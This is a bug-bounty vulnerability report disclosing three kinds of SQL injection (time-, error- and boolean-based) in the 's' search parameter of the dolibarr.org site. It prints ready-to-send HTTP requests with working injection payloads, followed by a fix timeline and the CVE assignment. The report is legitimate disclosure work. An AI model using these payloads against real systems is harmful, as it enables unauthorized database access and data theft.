3 Types of SQLi in `s` param - (Time/Boolean/Error Based) in dolibarr/dolibarr

Valid

Reported on

Nov 18th 2022


Description

I have found 3 types of SQLi on the s parameter

Proof of Concept

Time-Based

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

  • Send this request and it will come after 10 seconds!
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Error-Based

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site or logged to a file with restricted access instead.

  • Also, send this and it will make a SQL error!
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Boolean-Based

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Impact

SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.

We are processing your report and will contact the dolibarr team within 24 hours. 17 days ago
We have contacted a member of the dolibarr team and are waiting to hear back 16 days ago
Laurent Destailleur validated this vulnerability 15 days ago
Abdelrhman Allam has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 16.0.3 with commit 7c1eac 15 days ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability has been assigned a CVE
Laurent Destailleur published this vulnerability 15 days ago
Abdelrhman
15 days ago

Researcher


@admin, can you assigned a CVE?

Laurent Destailleur gave praise 15 days ago
I think CVE is assigned automatically by hunter. A mention into the log say a CVE was assigned.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Abdelrhman
15 days ago

Researcher


Thanks for support.

to join this conversation